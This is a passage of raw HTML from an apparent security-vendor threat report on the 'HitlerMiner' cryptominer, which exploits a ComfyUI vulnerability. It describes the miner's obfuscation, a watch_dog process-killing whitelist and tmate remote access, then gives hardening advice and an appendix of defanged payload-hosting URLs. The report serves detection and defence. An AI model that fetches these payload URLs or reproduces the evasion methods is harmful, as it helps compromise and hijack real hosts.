src="https://wechat2rss.xlab.app/img-proxy/?k=036c4e23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKUtQPgazpOsb1ce3ntVSJicIRNuv3icV6Y6Yg29ckzMMbgw0Ipu6XuLy8icIIuAoKu5KNrJ0JjX1Rqhr7b6SjRAeouqvMvlK6T5o%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span data-mpa-action-id="mmwvxqy75g6" data-pm-slice="0 0 []"><span leaf="">早期miner_manager.py使用明文的文件名集合，且在injector.py中进行赋值。<img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.13636363636363635" data-s="300,640" data-type="png" data-w="1078" type="block" data-imgfileid="100024332" src="https://wechat2rss.xlab.app/img-proxy/?k=b15b71fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXID4mX7OHXEa4ZAKq5qLIqia9C7aCftQBLHKicLIMWly7WQ9UiaMaeYREyLCjrPlmrhYobhJ5Eial5RibLfzExpAxxhfSmOSle0atJU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwwvcx51s7h" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mmwwvcxk52f" data-pm-slice="0 0 []"><span leaf="">2026-01-13之后的新变种则使用base64编码的文件名集、路径集，并调用three_random()给xmrig, lol, watchdog三个文件生成随机的绝对路径。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.31990330378726833" data-s="300,640" data-type="png" data-w="1241" type="block" data-imgfileid="100024334" src="https://wechat2rss.xlab.app/img-proxy/?k=0dd00e60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJDVvyurHUeozmsmLyia2jvDBVcMqZE3dBYq7PibNHsic0jgib8ibcymUXTcrictuHyDtC28Qp0KvQ2ibvZJ6hmc9w6ia1CLtK9lMIq0mw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwvxfoen7j" style="font-size: 17px;" data-mpa-action-id="mmwvxfp01ual" data-pm-slice="0 0 []"><span leaf="">最终，/root目录下安装的矿工、配置文件、挖矿日志如下：</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.2987249544626594" data-s="300,640" data-type="png" data-w="549" type="block" data-imgfileid="100024335" src="https://wechat2rss.xlab.app/img-proxy/?k=abf0a8f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKs5wV3JVMWicn7mibUckxRlAorlXcwJjz8GTuobG10R0x1lI4KMlRPibibYavwP2icx3FyFibLBQibnorvwFbqokj0KFKSXs4hWnJeBc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwvoxg23cy" data-pm-slice="0 0 []"><span style="font-weight: bold;font-size: 17px;" mpa-font-style="mmwvxc1179"><span leaf="" mpa-font-style="mmwwvowz705" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">4.5</span></span><span mpa-font-style="mmwvxc111me8" style="font-size: 17px;"><span style="font-variant: normal;text-transform: none;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwvowz1vcg"><span leaf=""><span textstyle="" style="font-weight: bold;">挖矿进程守护程序</span></span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwvowz95m"><span leaf="">watch_dog</span></span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti7ap"><span leaf="" mpa-font-style="mmwvxc11e0" style="font-size: 17px;">watch_dog是一个VT 0检出的ELF木马，其使用白名单机制，通过监控CPU和GPU使用情况，自动终止白名单外的高负载可疑进程。白名单的判断条件如下： </span></span></p><p><table style="width:551px;"><tbody><tr><td data-colwidth="141"><p style="text-align: center;"><span style="font-size: 15px;"><span leaf=""><span textstyle="" style="font-weight: bold;">判断条件</span></span></span></p></td><td data-colwidth="261"><p style="text-align: center;"><span style="font-size: 15px;"><span leaf=""><span textstyle="" style="font-weight: bold;">说明</span></span></span></p></td><td data-colwidth="149"><p style="text-align: center;"><span style="font-size: 15px;"><span leaf=""><span textstyle="" style="font-weight: bold;">结果</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">PID检查</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;" data-pm-slice="0 0 []"><span leaf="">PID &lt;= 100</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">（系统进程）、自身</span><span lang="EN-US"><span leaf="">PID</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">PID=1</span></span><span leaf="">（</span><span lang="EN-US"><span leaf="">init</span></span><span leaf="">）</span></span></span></p></td><td data-colwidth="149"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">✅</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">可信，跳过</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">基础设施关键词</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span style="font-family: 微软雅黑, sans-serif;" data-pm-slice="0 0 []"><span leaf="">命令行或可执行路径包含</span><span lang="EN-US"><span leaf=""> docker, containerd, dockerd, kube, kubelet, kube-proxy, cri-containerd, node</span></span></span></span></p></td><td data-colwidth="149"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">✅</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">可信，跳过</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">白名单路径</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;" data-pm-slice="0 0 []"><span leaf="">WHITELIST_PATHS</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">中的路径，即矿工路径</span></span></span></p></td><td data-colwidth="149"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">✅</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">可信，跳过</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">Python解释器路径</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;" data-pm-slice="0 0 []"><span leaf="">PYTHON_EXECUTABLE_PATHS</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">中的路径</span></span></span></p></td><td data-colwidth="149"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">✅</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">可信，跳过</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">ComfyUI关键字</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span style="font-family: 微软雅黑, sans-serif;" data-pm-slice="0 0 []"><span leaf="">命令行包含</span><span lang="EN-US"><span leaf=""> &#34;ComfyUI&#34; </span></span><span leaf="">字符串</span></span></span></p></td><td data-colwidth="149"><p><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">✅</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">可信，跳过</span></span></span></p></td></tr><tr><td data-colwidth="141"><p><span style="font-size: 15px;"><span leaf="">以上都不满足</span></span></p></td><td data-colwidth="261"><p><span style="font-size: 15px;"><span leaf="">无</span></span></p></td><td data-colwidth="149"><p data-mpa-action-id="mmx2t22q1lfv"><span style="font-size: 15px;"><span lang="EN-US" style="font-family: &#34;Segoe UI Symbol&#34;, sans-serif;" data-pm-slice="0 0 []"><span leaf="">❌</span></span><span style="font-family: 微软雅黑, sans-serif;"><span leaf="">不可信，清理</span></span></span></p></td></tr></tbody></table></p><p style="text-indent: 2em;" data-pm-slice="0 0 []"><span lang="EN-US"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">2025.12.10</span></span><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">最初版本的</span><span lang="EN-US"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">watch_dog</span></span><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">先使用</span><span lang="EN-US"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">gzip</span></span><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">压缩，而后做了</span><span lang="EN-US"><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">base64</span></span><span leaf="" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">编码。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5363020329138432" data-s="300,640" data-type="png" data-w="1033" type="block" data-imgfileid="100024336" src="https://wechat2rss.xlab.app/img-proxy/?k=63d3b3aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIvpB2iaGTOgFLj21dkPxIcg0qjU19bqReRLicBpRdngNIibia4s5fGfnpfEK5C0iamXnpfCrF1Tgy4JH1sDt3BXE10rCibre3OhGNY8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwww0u91dwk" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mmwww0um1tvh" data-pm-slice="0 0 []"><span leaf="">紧接着的watch_dog版本使用明文白名单WHITELIST_PATHS，而2026-01-13之后的新变种则开始使用base64编码。</span></span><o:page></o:page></p><h2 style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span mpa-font-style="mmvulbti1hul" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="font-weight: bold;">4.6</span></span></span><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="font-weight: bold;">安装tmate共享软件</span></span></span></span></h2><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbtis4c"><span leaf="">ComfyUI日志文件中还包含下载安装Terminal共享软件tmate的记录（允许攻击者远控中招主机），但这些俄语字符串在攻击者项目源码中并不存在，中招主机中也没有包含这些俄语字符串的文件。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.1005586592178771" data-s="300,640" data-type="png" data-w="895" type="block" data-imgfileid="100024337" src="https://wechat2rss.xlab.app/img-proxy/?k=60731ed0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKa4FPy6cDbDx0WqOjSkhgsrI8iaNSeMkIUUkAkl72PoPQfibickqPk1c0wxGAcgdol7NArGMibUTOmL54nqNFt4ruO4kONbrX3A2I%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: center;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf=""><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvvb6c017tq"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="text-align: center;margin-bottom: 6px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Medium, PingFang SC;font-weight: bold;color: #C0312F;line-height: 22px;" data-mid="" mpa-is-content="t"><span leaf="" mpa-font-style="mmx31snry78" style="font-size: 18px;" data-mpa-action-id="mmx31so5o3c" data-pm-slice="0 0 []">防范及排查建议</span></p></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmvv98ul1j9p"><div mpa-from-tpl="t"><div data-mpa-category="模板" style="width: 100%;padding: 0px 12px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;background: rgba(190, 116, 146, 0.08);padding: 14px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;font-size: 14px;color: #333333;line-height: 24px;" data-mid="" mpa-from-tpl="t"><div yb-mpa-mark="mark-intro" style="width: 100%;margin-bottom: 8px;margin-top: 8px;text-indent: 2em;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mmwvst0fvww" data-pm-slice="0 0 []"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszw5xo" style="font-size: 17px;">AI的引入虽然极大提高了生产效率，但网络安全问题仍不容忽视，鉴于CVE-2026-22777高危漏洞影响全球数万台ComfyUI资产、利用难度较低，且POC也已公开，其漏洞修复工作刻不容缓。</span><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;text-indent: 2em;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszw1y2u" style="font-size: 17px;">HitlerMiner通过向ComfyUI关键文件（execution.py、server.py）注入挖矿脚本从而在启动时实现隐匿挖矿，并通过输出重定向方式隐藏输出、设置后门密钥、安装tmate共享软件、清理攻击痕迹等手段进一步强化对抗，此类攻击方式值得大家引起关注。</span></p><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;text-indent: 2em;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszwr1q" style="font-size: 17px;">广大用户可使用360安全大脑相关产品进行实时拦截与防护，并从以下4个方面进行加固，以免遭受黑客攻击，造成不必要的损失。</span></p><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;text-indent: 2em;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszw22jx" style="font-size: 17px;">1）升级ComfyUI、ComfyUI-Manager到安全新版本；</span></p><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszw1jlh" style="font-size: 17px;">2）避免使用 --listen 0.0.0.0等允许外部连接的参数启动 ComfyUI ，修改ComfyUI端口为其他端口（非8188默认端口）；</span></p><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszw57u" style="font-size: 17px;">3）若非业务需要，不要在公网暴露ComfyUI业务端口，采用本地或内网访问、设置访问白名单等方式进行加固；</span></p><p style="width: 100%;margin-bottom: 8px;margin-top: 8px;"><span leaf="" mpa-is-content="t" mpa-font-style="mmwvsszwna2" style="font-size: 17px;">4）使用Ngnix反向代理+认证方式进行加固。</span></p></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div></div><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-weight: bold;" mpa-font-style="mmvum0fpx1q"><span leaf="" style="font-size: 15px;">URL: </span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp3ll"><span leaf=""><a href="https://pastes[.]io/download/base64-encoded-gzip-payload" target="_blank">https://pastes[.]io/download/base64-encoded-gzip-payload</a></span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf=""><a href="http://bitbucket[.]org/kalost/installer/raw/main/init.py" target="_blank">http://bitbucket[.]org/kalost/installer/raw/main/init.py</a></span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]org</span></span><span leaf="">/kalost/installer/raw/main/trex.sh</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp8av"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/ocean.sh</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fphfs"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 